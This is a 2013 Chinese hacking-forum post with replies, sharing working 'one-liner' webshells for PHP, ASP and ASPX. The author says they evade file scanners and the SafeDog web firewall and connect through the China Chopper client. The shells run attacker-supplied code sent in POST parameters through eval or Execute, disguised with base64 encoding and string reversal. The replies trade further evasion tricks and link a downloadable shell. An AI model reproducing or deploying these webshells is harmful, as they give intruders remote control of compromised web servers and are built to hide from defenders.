其实已经不是一句话了,好几句了都。
继续上次的:我使用的一句话的几种姿态
这回研究了下PHP,发一下我使用的一句话(可过文件扫描)。
<?php $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>
密码z,支持菜刀连接;支持变异菜刀连接以过安全狗。
另外:
ASP:
<% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) End Function Execute MorfiCoder(")/*/z/*/(tseuqer lave") %>
ASPX:
<script runat="server" language="JScript"> function popup(str) { var q = "u"; var w = "afe"; var a = q + "ns" + w; var b= eval(str,a); return(b); } </script> <% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); %>
以上都已支持变异菜刀连接以过安全狗。
………………
请网站安全狗团队加入黑名单以便找出更佳的绕狗方法……
相关吐槽:
1#
whirlwind (。。。。。。) | 2013-10-15 22:00
不错!
2#
RedFree (才了现了,自己是自己的神器。) | 2013-10-15 22:09
@whirlwind 各位看官,点5下感谢,我给你发ASP,ASPX,PHP都过狗的菜刀。不发@MuJJ 找@落叶纷飞 ……
3#
Lee Swagger (撸妹啊1020) | 2013-10-15 22:50
@RedFree 各位看官,点1下感谢 我给你发ASP,ASPX,PHP都过狗的菜刀
4#
江南的鱼 | 2013-10-15 23:13
哎,eval 关键字一扫,啥看不出?
目测过不了阿D扫描!
5#
RedFree (才了现了,自己是自己的神器。) | 2013-10-15 23:30
@江南的鱼 那就废了eval,execute,executeglobal,assert……吧,目测都是木马……^_^
6#
ACGT | 2013-10-16 08:39
建议用php函数array_map,一般不查
7#
江南的鱼 | 2013-10-16 09:00
我来个过阿D扫描的,很单纯的菜刀链接,不过狗!
http://pan.baidu.com/s/11N7nQ
下载地址:0.php
8#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-10-16 09:27
eval、Execute 硬伤啊……
9#
RedFree (才了现了,自己是自己的神器。) | 2013-10-16 10:22
@核攻击 安全狗够快,前一天发出来,第二天就不能用了…… 哈哈
10#
Lenwood (\r) | 2013-10-16 10:26
@RedFree 类似免杀了,方法多样。都是源码免杀,总有一款适合你。
留言评论(旧系统):